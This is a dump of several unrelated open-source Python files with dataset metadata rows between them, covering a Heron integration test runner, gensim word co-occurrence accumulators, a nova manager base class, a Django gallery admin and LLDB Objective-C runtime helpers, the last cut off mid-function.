# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" main.py """
import getpass
import json
import logging
import os
import pkgutil
import time
import socket
import subprocess
import sys
from collections import namedtuple
from ..common import status
from heron.common.src.python.utils import log
# import test_kill_bolt
from . import test_kill_metricsmgr
from . import test_kill_stmgr
from . import test_kill_stmgr_metricsmgr
from . import test_kill_tmanager
from . import test_scale_up
from . import test_template
from . import test_explorer
TEST_CLASSES = [
test_template.TestTemplate,
test_kill_tmanager.TestKillTManager,
test_kill_stmgr.TestKillStmgr,
test_kill_metricsmgr.TestKillMetricsMgr,
test_kill_stmgr_metricsmgr.TestKillStmgrMetricsMgr,
test_scale_up.TestScaleUp,
# test_kill_bolt.TestKillBolt,
test_explorer.TestExplorer,
]
# The location of default configure file
DEFAULT_TEST_CONF_FILE = "integration_test/src/python/local_test_runner/resources/test.conf"
ProcessTuple = namedtuple('ProcessTuple', 'pid cmd')
def run_tests(test_classes, args):
""" Run the test for each topology specified in the conf file """
successes = []
failures = []
tracker_process = _start_tracker(args['trackerPath'], args['trackerPort'])
try:
for test_class in test_classes:
testname = test_class.__name__
logging.info("==== Starting test %s of %s: %s ====",
len(successes) + len(failures) + 1, len(test_classes), testname)
template = test_class(testname, args)
try:
result = template.run_test()
if isinstance(result, status.TestSuccess): # testcase passed
successes += [testname]
elif isinstance(result, status.TestFailure):
failures += [testname]
else:
logging.error(
"Unrecognized test response returned for test %s: %s", testname, str(result))
failures += [testname]
except status.TestFailure:
failures += [testname]
except Exception as e:
logging.error("Exception thrown while running tests: %s", str(e), exc_info=True)
finally:
tracker_process.kill()
return successes, failures
def _start_tracker(tracker_path, tracker_port):
splitcmd = [tracker_path, '--verbose', '--port=%s' % tracker_port]
logging.info("Starting heron tracker: %s", splitcmd)
popen = subprocess.Popen(splitcmd)
logging.info("Successfully started heron tracker on port %s", tracker_port)
return popen
def _random_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def main():
""" main """
log.configure(level=logging.DEBUG)
# Read the configuration file from package
conf_file = DEFAULT_TEST_CONF_FILE
conf_string = pkgutil.get_data(__name__, conf_file).decode()
decoder = json.JSONDecoder(strict=False)
# Convert the conf file to a json format
conf = decoder.decode(conf_string)
args = dict()
home_directory = os.path.expanduser("~")
args['cluster'] = conf['cluster']
args['topologyName'] = conf['topology']['topologyName']
args['topologyClassPath'] = conf['topology']['topologyClassPath']
args['workingDirectory'] = os.path.join(
home_directory,
".herondata",
"topologies",
conf['cluster'],
getpass.getuser(),
args['topologyName']
)
args['cliPath'] = os.path.expanduser(conf['heronCliPath'])
args['trackerPath'] = os.path.expanduser(conf['heronTrackerPath'])
args['trackerPort'] = _random_port()
args['outputFile'] = os.path.join(args['workingDirectory'], conf['topology']['outputFile'])
args['readFile'] = os.path.join(args['workingDirectory'], conf['topology']['readFile'])
args['testJarPath'] = conf['testJarPath']
test_classes = TEST_CLASSES
if len(sys.argv) > 1:
first_arg = sys.argv[1]
class_tokens = first_arg.split(".")
if first_arg == "-h" or len(class_tokens) < 2:
usage()
import importlib
package_tokens = class_tokens[:-1]
test_class = class_tokens[-1]
if len(package_tokens) == 1: # prepend base packages for convenience
test_module = "integration_test.src.python.local_test_runner." + package_tokens[0]
else:
test_module = '.'.join(package_tokens)
logging.info("test_module %s", test_module)
logging.info("test_class %s", test_class)
test_classes = [getattr(importlib.import_module(test_module), test_class)]
start_time = time.time()
(successes, failures) = run_tests(test_classes, args)
elapsed_time = time.time() - start_time
total = len(failures) + len(successes)
if not failures:
logging.info("Success: %s (all) tests passed", len(successes))
logging.info("Elapsed time: %s", elapsed_time)
sys.exit(0)
else:
logging.error("Fail: %s/%s test failed:", len(failures), total)
for test in failures:
logging.error(" - %s", test)
sys.exit(1)
def usage():
logging.info("Usage: python %s [<test_module>.<testname>]", sys.argv[0])
sys.exit(1)
if __name__ == '__main__':
main()
|
apache-2.0
| -6,514,305,771,824,474,000 | 31.677778 | 93 | 0.683101 | false |
mattilyra/gensim
|
gensim/topic_coherence/text_analysis.py
|
1
|
24297
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""This module contains classes for analyzing the texts of a corpus to accumulate
statistical information about word occurrences."""
import itertools
import logging
import multiprocessing as mp
import sys
from collections import Counter
import numpy as np
import scipy.sparse as sps
from six import iteritems, string_types
from gensim import utils
from gensim.models.word2vec import Word2Vec
logger = logging.getLogger(__name__)
def _ids_to_words(ids, dictionary):
"""Convert an iterable of ids to their corresponding words using a dictionary.
Abstract away the differences between the HashDictionary and the standard one.
Parameters
----------
ids: dict
Dictionary of ids and their words.
dictionary: :class:`~gensim.corpora.dictionary.Dictionary`
Input gensim dictionary
Returns
-------
set
Corresponding words.
Examples
--------
>>> from gensim.corpora.dictionary import Dictionary
>>> from gensim.topic_coherence import text_analysis
>>>
>>> dictionary = Dictionary()
>>> ids = {1: 'fake', 4: 'cats'}
>>> dictionary.id2token = {1: 'fake', 2: 'tokens', 3: 'rabbids', 4: 'cats'}
>>>
>>> text_analysis._ids_to_words(ids, dictionary)
set(['cats', 'fake'])
"""
if not dictionary.id2token: # may not be initialized in the standard gensim.corpora.Dictionary
setattr(dictionary, 'id2token', {v: k for k, v in dictionary.token2id.items()})
top_words = set()
for word_id in ids:
word = dictionary.id2token[word_id]
if isinstance(word, set):
top_words = top_words.union(word)
else:
top_words.add(word)
return top_words
class BaseAnalyzer(object):
"""Base class for corpus and text analyzers.
Attributes
----------
relevant_ids : dict
Mapping
_vocab_size : int
Size of vocabulary.
id2contiguous : dict
Mapping word_id -> number.
log_every : int
Interval for logging.
_num_docs : int
Number of documents.
"""
def __init__(self, relevant_ids):
"""
Parameters
----------
relevant_ids : dict
Mapping
Examples
--------
>>> from gensim.topic_coherence import text_analysis
>>> ids = {1: 'fake', 4: 'cats'}
>>> base = text_analysis.BaseAnalyzer(ids)
>>> # should return {1: 'fake', 4: 'cats'} 2 {1: 0, 4: 1} 1000 0
>>> print base.relevant_ids, base._vocab_size, base.id2contiguous, base.log_every, base._num_docs
{1: 'fake', 4: 'cats'} 2 {1: 0, 4: 1} 1000 0
"""
self.relevant_ids = relevant_ids
self._vocab_size = len(self.relevant_ids)
self.id2contiguous = {word_id: n for n, word_id in enumerate(self.relevant_ids)}
self.log_every = 1000
self._num_docs = 0
@property
def num_docs(self):
return self._num_docs
@num_docs.setter
def num_docs(self, num):
self._num_docs = num
if self._num_docs % self.log_every == 0:
logger.info(
"%s accumulated stats from %d documents",
self.__class__.__name__, self._num_docs)
def analyze_text(self, text, doc_num=None):
raise NotImplementedError("Base classes should implement analyze_text.")
def __getitem__(self, word_or_words):
if isinstance(word_or_words, string_types) or not hasattr(word_or_words, '__iter__'):
return self.get_occurrences(word_or_words)
else:
return self.get_co_occurrences(*word_or_words)
def get_occurrences(self, word_id):
"""Return number of docs the word occurs in, once `accumulate` has been called."""
return self._get_occurrences(self.id2contiguous[word_id])
def _get_occurrences(self, word_id):
raise NotImplementedError("Base classes should implement occurrences")
def get_co_occurrences(self, word_id1, word_id2):
"""Return number of docs the words co-occur in, once `accumulate` has been called."""
return self._get_co_occurrences(self.id2contiguous[word_id1], self.id2contiguous[word_id2])
def _get_co_occurrences(self, word_id1, word_id2):
raise NotImplementedError("Base classes should implement co_occurrences")
class UsesDictionary(BaseAnalyzer):
"""A BaseAnalyzer that uses a Dictionary, hence can translate tokens to counts.
The standard BaseAnalyzer can only deal with token ids since it doesn't have the token2id
mapping.
Attributes
----------
relevant_words : set
Set of words that occurrences should be accumulated for.
dictionary : :class:`~gensim.corpora.dictionary.Dictionary`
Dictionary based on text
token2id : dict
Mapping from :class:`~gensim.corpora.dictionary.Dictionary`
"""
def __init__(self, relevant_ids, dictionary):
"""
Parameters
----------
relevant_ids : dict
Mapping
dictionary : :class:`~gensim.corpora.dictionary.Dictionary`
Dictionary based on text
Examples
--------
>>> from gensim.topic_coherence import text_analysis
>>> from gensim.corpora.dictionary import Dictionary
>>>
>>> ids = {1: 'foo', 2: 'bar'}
>>> dictionary = Dictionary([['foo','bar','baz'], ['foo','bar','bar','baz']])
>>> udict = text_analysis.UsesDictionary(ids, dictionary)
>>>
>>> print udict.relevant_words
set([u'foo', u'baz'])
"""
super(UsesDictionary, self).__init__(relevant_ids)
self.relevant_words = _ids_to_words(self.relevant_ids, dictionary)
self.dictionary = dictionary
self.token2id = dictionary.token2id
def get_occurrences(self, word):
"""Return number of docs the word occurs in, once `accumulate` has been called."""
try:
word_id = self.token2id[word]
except KeyError:
word_id = word
return self._get_occurrences(self.id2contiguous[word_id])
def _word2_contiguous_id(self, word):
try:
word_id = self.token2id[word]
except KeyError:
word_id = word
return self.id2contiguous[word_id]
def get_co_occurrences(self, word1, word2):
"""Return number of docs the words co-occur in, once `accumulate` has been called."""
word_id1 = self._word2_contiguous_id(word1)
word_id2 = self._word2_contiguous_id(word2)
return self._get_co_occurrences(word_id1, word_id2)
class InvertedIndexBased(BaseAnalyzer):
"""Analyzer that builds up an inverted index to accumulate stats."""
def __init__(self, *args):
"""
Parameters
----------
args : dict
Look at :class:`~gensim.topic_coherence.text_analysis.BaseAnalyzer`
Examples
--------
>>> from gensim.topic_coherence import text_analysis
>>>
>>> ids = {1: 'fake', 4: 'cats'}
>>> ininb = text_analysis.InvertedIndexBased(ids)
>>>
>>> print ininb._inverted_index
[set([]) set([])]
"""
super(InvertedIndexBased, self).__init__(*args)
self._inverted_index = np.array([set() for _ in range(self._vocab_size)])
def _get_occurrences(self, word_id):
return len(self._inverted_index[word_id])
def _get_co_occurrences(self, word_id1, word_id2):
s1 = self._inverted_index[word_id1]
s2 = self._inverted_index[word_id2]
return len(s1.intersection(s2))
def index_to_dict(self):
contiguous2id = {n: word_id for word_id, n in iteritems(self.id2contiguous)}
return {contiguous2id[n]: doc_id_set for n, doc_id_set in enumerate(self._inverted_index)}
class CorpusAccumulator(InvertedIndexBased):
"""Gather word occurrence stats from a corpus by iterating over its BoW representation."""
def analyze_text(self, text, doc_num=None):
"""Build an inverted index from a sequence of corpus texts."""
doc_words = frozenset(x[0] for x in text)
top_ids_in_doc = self.relevant_ids.intersection(doc_words)
for word_id in top_ids_in_doc:
self._inverted_index[self.id2contiguous[word_id]].add(self._num_docs)
def accumulate(self, corpus):
for document in corpus:
self.analyze_text(document)
self.num_docs += 1
return self
class WindowedTextsAnalyzer(UsesDictionary):
"""Gather some stats about relevant terms of a corpus by iterating over windows of texts."""
def __init__(self, relevant_ids, dictionary):
"""
Parameters
----------
relevant_ids : set of int
Relevant id
dictionary : :class:`~gensim.corpora.dictionary.Dictionary`
Dictionary instance with mappings for the relevant_ids.
"""
super(WindowedTextsAnalyzer, self).__init__(relevant_ids, dictionary)
self._none_token = self._vocab_size # see _iter_texts for use of none token
def accumulate(self, texts, window_size):
relevant_texts = self._iter_texts(texts)
windows = utils.iter_windows(
relevant_texts, window_size, ignore_below_size=False, include_doc_num=True)
for doc_num, virtual_document in windows:
self.analyze_text(virtual_document, doc_num)
self.num_docs += 1
return self
def _iter_texts(self, texts):
dtype = np.uint16 if np.iinfo(np.uint16).max >= self._vocab_size else np.uint32
for text in texts:
if self.text_is_relevant(text):
yield np.array([
self.id2contiguous[self.token2id[w]] if w in self.relevant_words
else self._none_token
for w in text], dtype=dtype)
def text_is_relevant(self, text):
"""Check if the text has any relevant words."""
for word in text:
if word in self.relevant_words:
return True
return False
class InvertedIndexAccumulator(WindowedTextsAnalyzer, InvertedIndexBased):
"""Build an inverted index from a sequence of corpus texts."""
def analyze_text(self, window, doc_num=None):
for word_id in window:
if word_id is not self._none_token:
self._inverted_index[word_id].add(self._num_docs)
class WordOccurrenceAccumulator(WindowedTextsAnalyzer):
"""Accumulate word occurrences and co-occurrences from a sequence of corpus texts."""
def __init__(self, *args):
super(WordOccurrenceAccumulator, self).__init__(*args)
self._occurrences = np.zeros(self._vocab_size, dtype='uint32')
self._co_occurrences = sps.lil_matrix((self._vocab_size, self._vocab_size), dtype='uint32')
self._uniq_words = np.zeros((self._vocab_size + 1,), dtype=bool) # add 1 for none token
self._counter = Counter()
def __str__(self):
return self.__class__.__name__
def accumulate(self, texts, window_size):
self._co_occurrences = self._co_occurrences.tolil()
self.partial_accumulate(texts, window_size)
self._symmetrize()
return self
def partial_accumulate(self, texts, window_size):
"""Meant to be called several times to accumulate partial results.
Notes
-----
The final accumulation should be performed with the `accumulate` method as opposed to this one.
This method does not ensure the co-occurrence matrix is in lil format and does not
symmetrize it after accumulation.
"""
self._current_doc_num = -1
self._token_at_edge = None
self._counter.clear()
super(WordOccurrenceAccumulator, self).accumulate(texts, window_size)
for combo, count in iteritems(self._counter):
self._co_occurrences[combo] += count
return self
def analyze_text(self, window, doc_num=None):
self._slide_window(window, doc_num)
mask = self._uniq_words[:-1] # to exclude none token
if mask.any():
self._occurrences[mask] += 1
self._counter.update(itertools.combinations(np.nonzero(mask)[0], 2))
def _slide_window(self, window, doc_num):
if doc_num != self._current_doc_num:
self._uniq_words[:] = False
self._uniq_words[np.unique(window)] = True
self._current_doc_num = doc_num
else:
self._uniq_words[self._token_at_edge] = False
self._uniq_words[window[-1]] = True
self._token_at_edge = window[0]
def _symmetrize(self):
"""Word pairs may have been encountered in (i, j) and (j, i) order.
Notes
-----
Rather than enforcing a particular ordering during the update process,
we choose to symmetrize the co-occurrence matrix after accumulation has completed.
"""
co_occ = self._co_occurrences
co_occ.setdiag(self._occurrences) # diagonal should be equal to occurrence counts
self._co_occurrences = \
co_occ + co_occ.T - sps.diags(co_occ.diagonal(), offsets=0, dtype='uint32')
def _get_occurrences(self, word_id):
return self._occurrences[word_id]
def _get_co_occurrences(self, word_id1, word_id2):
return self._co_occurrences[word_id1, word_id2]
def merge(self, other):
self._occurrences += other._occurrences
self._co_occurrences += other._co_occurrences
self._num_docs += other._num_docs
class PatchedWordOccurrenceAccumulator(WordOccurrenceAccumulator):
"""Monkey patched for multiprocessing worker usage, to move some of the logic to the master process."""
def _iter_texts(self, texts):
return texts # master process will handle this
class ParallelWordOccurrenceAccumulator(WindowedTextsAnalyzer):
"""Accumulate word occurrences in parallel.
Attributes
----------
processes : int
Number of processes to use; must be at least two.
args :
Should include `relevant_ids` and `dictionary` (see :class:`~UsesDictionary.__init__`).
kwargs :
Can include `batch_size`, which is the number of docs to send to a worker at a time.
If not included, it defaults to 64.
"""
def __init__(self, processes, *args, **kwargs):
super(ParallelWordOccurrenceAccumulator, self).__init__(*args)
if processes < 2:
raise ValueError(
"Must have at least 2 processes to run in parallel; got %d" % processes)
self.processes = processes
self.batch_size = kwargs.get('batch_size', 64)
def __str__(self):
return "%s(processes=%s, batch_size=%s)" % (
self.__class__.__name__, self.processes, self.batch_size)
def accumulate(self, texts, window_size):
workers, input_q, output_q = self.start_workers(window_size)
try:
self.queue_all_texts(input_q, texts, window_size)
interrupted = False
except KeyboardInterrupt:
logger.warn("stats accumulation interrupted; <= %d documents processed", self._num_docs)
interrupted = True
accumulators = self.terminate_workers(input_q, output_q, workers, interrupted)
return self.merge_accumulators(accumulators)
def start_workers(self, window_size):
"""Set up an input and output queue and start processes for each worker.
Notes
-----
The input queue is used to transmit batches of documents to the workers.
The output queue is used by workers to transmit the WordOccurrenceAccumulator instances.
Parameters
----------
window_size : int
Returns
-------
(list of lists)
Tuple of (list of workers, input queue, output queue).
"""
input_q = mp.Queue(maxsize=self.processes)
output_q = mp.Queue()
workers = []
for _ in range(self.processes):
accumulator = PatchedWordOccurrenceAccumulator(self.relevant_ids, self.dictionary)
worker = AccumulatingWorker(input_q, output_q, accumulator, window_size)
worker.start()
workers.append(worker)
return workers, input_q, output_q
def yield_batches(self, texts):
"""Return a generator over the given texts that yields batches of `batch_size` texts at a time."""
batch = []
for text in self._iter_texts(texts):
batch.append(text)
if len(batch) == self.batch_size:
yield batch
batch = []
if batch:
yield batch
def queue_all_texts(self, q, texts, window_size):
"""Sequentially place batches of texts on the given queue until `texts` is consumed.
The texts are filtered so that only those with at least one relevant token are queued.
"""
for batch_num, batch in enumerate(self.yield_batches(texts)):
q.put(batch, block=True)
before = self._num_docs / self.log_every
self._num_docs += sum(len(doc) - window_size + 1 for doc in batch)
if before < (self._num_docs / self.log_every):
logger.info(
"%d batches submitted to accumulate stats from %d documents (%d virtual)",
(batch_num + 1), (batch_num + 1) * self.batch_size, self._num_docs)
def terminate_workers(self, input_q, output_q, workers, interrupted=False):
"""Wait until all workers have transmitted their WordOccurrenceAccumulator instances, then terminate each.
Warnings
--------
We do not use join here because it has been shown to have some issues
in Python 2.7 (and even in later versions). This method also closes both the input and output queue.
If `interrupted` is False (normal execution), a None value is placed on the input queue for
each worker. The workers are looking for this sentinel value and interpret it as a signal to
terminate themselves. If `interrupted` is True, a KeyboardInterrupt occurred. The workers are
programmed to recover from this and continue on to transmit their results before terminating.
So in this instance, the sentinel values are not queued, but the rest of the execution
continues as usual.
"""
if not interrupted:
for _ in workers:
input_q.put(None, block=True)
accumulators = []
while len(accumulators) != len(workers):
accumulators.append(output_q.get())
logger.info("%d accumulators retrieved from output queue", len(accumulators))
for worker in workers:
if worker.is_alive():
worker.terminate()
input_q.close()
output_q.close()
return accumulators
def merge_accumulators(self, accumulators):
"""Merge the list of accumulators into a single `WordOccurrenceAccumulator` with all
occurrence and co-occurrence counts, and a `num_docs` that reflects the total observed
by all the individual accumulators.
"""
accumulator = WordOccurrenceAccumulator(self.relevant_ids, self.dictionary)
for other_accumulator in accumulators:
accumulator.merge(other_accumulator)
# Workers do partial accumulation, so none of the co-occurrence matrices are symmetrized.
# This is by design, to avoid unnecessary matrix additions/conversions during accumulation.
accumulator._symmetrize()
logger.info("accumulated word occurrence stats for %d virtual documents", accumulator.num_docs)
return accumulator
class AccumulatingWorker(mp.Process):
"""Accumulate stats from texts fed in from queue."""
def __init__(self, input_q, output_q, accumulator, window_size):
super(AccumulatingWorker, self).__init__()
self.input_q = input_q
self.output_q = output_q
self.accumulator = accumulator
self.accumulator.log_every = sys.maxsize # avoid logging in workers
self.window_size = window_size
def run(self):
try:
self._run()
except KeyboardInterrupt:
logger.info(
"%s interrupted after processing %d documents",
self.__class__.__name__, self.accumulator.num_docs)
except Exception:
logger.exception("worker encountered unexpected exception")
finally:
self.reply_to_master()
def _run(self):
batch_num = -1
n_docs = 0
while True:
batch_num += 1
docs = self.input_q.get(block=True)
if docs is None: # sentinel value
logger.debug("observed sentinel value; terminating")
break
self.accumulator.partial_accumulate(docs, self.window_size)
n_docs += len(docs)
logger.debug(
"completed batch %d; %d documents processed (%d virtual)",
batch_num, n_docs, self.accumulator.num_docs)
logger.debug(
"finished all batches; %d documents processed (%d virtual)",
n_docs, self.accumulator.num_docs)
def reply_to_master(self):
logger.info("serializing accumulator to return to master...")
self.output_q.put(self.accumulator, block=False)
logger.info("accumulator serialized")
class WordVectorsAccumulator(UsesDictionary):
"""Accumulate context vectors for words using word vector embeddings.
Attributes
----------
model: Word2Vec (:class:`~gensim.models.keyedvectors.KeyedVectors`)
If None, a new Word2Vec model is trained on the given text corpus. Otherwise,
it should be a pre-trained Word2Vec context vectors.
model_kwargs:
if model is None, these keyword arguments will be passed through to the Word2Vec constructor.
"""
def __init__(self, relevant_ids, dictionary, model=None, **model_kwargs):
super(WordVectorsAccumulator, self).__init__(relevant_ids, dictionary)
self.model = model
self.model_kwargs = model_kwargs
def not_in_vocab(self, words):
uniq_words = set(utils.flatten(words))
return set(word for word in uniq_words if word not in self.model.vocab)
def get_occurrences(self, word):
"""Return number of docs the word occurs in, once `accumulate` has been called."""
try:
self.token2id[word] # is this a token or an id?
except KeyError:
word = self.dictionary.id2token[word]
return self.model.vocab[word].count
def get_co_occurrences(self, word1, word2):
"""Return number of docs the words co-occur in, once `accumulate` has been called."""
raise NotImplementedError("Word2Vec model does not support co-occurrence counting")
def accumulate(self, texts, window_size):
if self.model is not None:
logger.debug("model is already trained; no accumulation necessary")
return self
kwargs = self.model_kwargs.copy()
if window_size is not None:
kwargs['window'] = window_size
kwargs['min_count'] = kwargs.get('min_count', 1)
kwargs['sg'] = kwargs.get('sg', 1)
kwargs['hs'] = kwargs.get('hw', 0)
self.model = Word2Vec(**kwargs)
self.model.build_vocab(texts)
self.model.train(texts, total_examples=self.model.corpus_count, epochs=self.model.iter)
self.model = self.model.wv # retain KeyedVectors
return self
def ids_similarity(self, ids1, ids2):
words1 = self._words_with_embeddings(ids1)
words2 = self._words_with_embeddings(ids2)
return self.model.n_similarity(words1, words2)
def _words_with_embeddings(self, ids):
if not hasattr(ids, '__iter__'):
ids = [ids]
words = [self.dictionary.id2token[word_id] for word_id in ids]
return [word for word in words if word in self.model.vocab]
|
lgpl-2.1
| -9,207,384,496,336,503,000 | 35.925532 | 114 | 0.619542 | false |
gaolichuang/py-task-framework
|
nova/manager.py
|
1
|
5055
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Base Manager class.
Managers are responsible for a certain aspect of the system. It is a logical
grouping of code relating to a portion of the system. In general other
components should be using the manager to make changes to the components that
it is responsible for.
For example, other components that need to deal with volumes in some way,
should do so by calling methods on the VolumeManager instead of directly
changing fields in the database. This allows us to keep all of the code
relating to volumes in the same place.
We have adopted a basic strategy of Smart managers and dumb data, which means
rather than attaching methods to data objects, components should call manager
methods that act on the data.
Methods on managers that can be executed locally should be called directly. If
a particular method must execute on a remote host, this should be done via rpc
to the service that wraps the manager
Managers should be responsible for most of the db access, and
non-implementation specific data. Anything implementation specific that can't
be generalized should be done by the Driver.
In general, we prefer to have one manager with multiple drivers for different
implementations, but sometimes it makes sense to have multiple managers. You
can think of it this way: Abstract different overall strategies at the manager
level(FlatNetwork vs VlanNetwork), and different implementations at the driver
level(LinuxNetDriver vs CiscoNetDriver).
Managers will often provide methods for initial setup of a host or periodic
tasks to a wrapping service.
This module provides Manager, a base class for managers.
"""
from oslo.config import cfg
from nova import baserpc
from nova.db import base
from nova import notifier
from nova.objects import base as objects_base
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import periodic_task
from nova.openstack.common.rpc import dispatcher as rpc_dispatcher
CONF = cfg.CONF
CONF.import_opt('host', 'nova.netconf')
LOG = logging.getLogger(__name__)
class Manager(base.Base, periodic_task.PeriodicTasks):
# Set RPC API version to 1.0 by default.
RPC_API_VERSION = '1.0'
def __init__(self, host=None, db_driver=None, service_name='undefined'):
if not host:
host = CONF.host
self.host = host
self.backdoor_port = None
self.service_name = service_name
self.notifier = notifier.get_notifier(self.service_name, self.host)
super(Manager, self).__init__(db_driver)
def create_rpc_dispatcher(self, backdoor_port=None, additional_apis=None):
'''Get the rpc dispatcher for this manager.
If a manager would like to set an rpc API version, or support more than
one class as the target of rpc messages, override this method.
'''
apis = []
if additional_apis:
apis.extend(additional_apis)
base_rpc = baserpc.BaseRPCAPI(self.service_name, backdoor_port)
apis.extend([self, base_rpc])
serializer = objects_base.NovaObjectSerializer()
return rpc_dispatcher.RpcDispatcher(apis, serializer)
def periodic_tasks(self, context, raise_on_error=False):
"""Tasks to be run at a periodic interval."""
return self.run_periodic_tasks(context, raise_on_error=raise_on_error)
def init_host(self):
"""Hook to do additional manager initialization when one requests
the service be started. This is called before any service record
is created.
Child classes should override this method.
"""
pass
def pre_start_hook(self):
"""Hook to provide the manager the ability to do additional
start-up work before any RPC queues/consumers are created. This is
called after other initialization has succeeded and a service
record is created.
Child classes should override this method.
"""
pass
def post_start_hook(self):
"""Hook to provide the manager the ability to do additional
start-up work immediately after a service creates RPC consumers
and starts 'running'.
Child classes should override this method.
"""
pass
|
apache-2.0
| -5,186,284,612,501,895,000 | 37.295455 | 79 | 0.726607 | false |
codefisher/djangopress
|
djangopress/gallery/admin.py
|
1
|
4575
|
from .models import GallerySection, Image, GALLERY_SETTINGS, Thumber
from django.contrib import admin
from django import forms
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.urls import reverse
try:
from tinymce import widgets as tinymce_widgets
except ImportError:
tinymce_widgets = None
class GalleryAdminForm(forms.ModelForm):
class Meta:
model = GallerySection
if tinymce_widgets:
widgets = {
'description': tinymce_widgets.AdminTinyMCE,
}
exclude = ()
class ImageAdminForm(forms.ModelForm):
class Meta(object):
model = Image
widgets = {
'description': forms.TextInput
}
exclude = ()
class ImageInline(admin.StackedInline):
model = Image
form = ImageAdminForm
extra = 1
min_num = 0
class ThumbnailForm(forms.Form):
_selected_action = forms.CharField(widget=forms.MultipleHiddenInput)
sizes = GALLERY_SETTINGS.get("sizes").get("thumb")
width = forms.IntegerField(initial=sizes.get('width'))
height = forms.IntegerField(initial=sizes.get('height'))
class GalleryAdmin(admin.ModelAdmin):
inlines = [ImageInline]
prepopulated_fields = {
"slug": ("title", )
}
fieldsets = (
(None, {
'fields': ('title', 'slug', 'description')
}),
("options", {
'fields': ('position', 'listed')
}),
)
actions = ['as_html']
form = GalleryAdminForm
list_display = ('text_title', 'position')
list_editable = ('position', )
ordering = ('position', 'title')
def as_html(self, request, queryset):
form = None
thumber = None
if 'apply' in request.POST:
form = ThumbnailForm(request.POST)
if form.is_valid():
thumber = Thumber(form.cleaned_data['width'], form.cleaned_data['height'])
if not form:
form = ThumbnailForm(initial={'_selected_action': request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'gallery/admin_gallery_as_html.html', {
'title': "Gallery as HTML",
'gallery_form': form,
'thumber': thumber,
'galleries': queryset,
'location': request.get_full_path,
})
admin.site.register(GallerySection, GalleryAdmin)
class MoveGalleryForm(forms.Form):
_selected_action = forms.CharField(widget=forms.MultipleHiddenInput)
gallery = forms.ModelChoiceField(GallerySection.objects, required=False)
class ImageAdmin(admin.ModelAdmin):
list_display = ('thumb', 'image', 'gallery', 'description')
list_filter = ('gallery',)
actions = ['change_gallery', 'as_html']
def change_gallery(self, request, queryset):
form = None
if 'apply' in request.POST:
form = MoveGalleryForm(request.POST)
if form.is_valid():
gallery = form.cleaned_data['gallery']
queryset.update(gallery=gallery)
if gallery:
self.message_user(request, "Moved images to gallery: {}.".format(gallery.title))
else:
self.message_user(request, "Removed images from gallery.")
return HttpResponseRedirect(request.get_full_path())
if not form:
form = MoveGalleryForm(initial={'_selected_action': request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'gallery/admin_change_gallery.html', {
'title': 'Change Image Gallery',
'images': queryset,
'gallery_form': form,
})
def as_html(self, request, queryset):
form = None
thumber = None
if 'apply' in request.POST:
form = ThumbnailForm(request.POST)
if form.is_valid():
thumber = Thumber(form.cleaned_data['width'], form.cleaned_data['height'])
if not form:
form = ThumbnailForm(initial={'_selected_action': request.POST.getlist(admin.ACTION_CHECKBOX_NAME)})
return render(request, 'gallery/admin_images_as_html.html', {
'title': "Images as HTML",
'gallery_form': form,
'thumber': thumber,
'images': queryset,
'location': request.get_full_path,
})
def thumb(self, obj):
if obj.thumbnail:
return '<img src="{}">'.format(obj.thumbnail)
return obj.image
thumb.allow_tags = True
admin.site.register(Image, ImageAdmin)
|
mit
| -9,221,700,838,383,901,000 | 31.913669 | 114 | 0.60153 | false |
zats/chisel
|
fblldbobjcruntimehelpers.py
|
1
|
3268
|
#!/usr/bin/python
# Copyright (c) 2014, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import re
import lldb
import fblldbbase as fb
def objc_getClass(className):
command = '(void*)objc_getClass("{}")'.format(className)
value = fb.evaluateExpression(command)
return value
def object_getClass(object):
command = '(void*)object_getClass({})'.format(object)
value = fb.evaluateExpression(command)
return value
def class_getName(klass):
command = '(const char*)class_getName((Class){})'.format(klass)
value = fb.evaluateExpressionValue(command).GetSummary().strip('"')
return value
def class_getSuperclass(klass):
command = '(void*)class_getSuperclass((Class){})'.format(klass)
value = fb.evaluateExpression(command)
return value
def class_isMetaClass(klass):
command = 'class_isMetaClass((Class){})'.format(klass)
return fb.evaluateBooleanExpression(command)
def class_getInstanceMethod(klass, selector):
command = '(void*)class_getInstanceMethod((Class){}, @selector({}))'.format(klass, selector)
value = fb.evaluateExpression(command)
return value
def currentArch():
targetTriple = lldb.debugger.GetSelectedTarget().GetTriple()
arch = targetTriple.split('-')[0]
if arch == 'x86_64h':
arch = 'x86_64'
return arch
def functionPreambleExpressionForSelf():
import re
arch = currentArch()
expressionForSelf = None
if arch == 'i386':
expressionForSelf = '*(id*)($esp+4)'
elif arch == 'x86_64':
expressionForSelf = '(id)$rdi'
elif arch == 'arm64':
expressionForSelf = '(id)$x0'
elif re.match(r'^armv.*$', arch):
expressionForSelf = '(id)$r0'
return expressionForSelf
def functionPreambleExpressionForObjectParameterAtIndex(parameterIndex):
arch = currentArch()
expresssion = None
if arch == 'i386':
expresssion = '*(id*)($esp + ' + str(12 + parameterIndex * 4) + ')'
elif arch == 'x86_64':
if parameterIndex > 3:
raise Exception("Current implementation can not return object at index greater than 3 for x86_64")
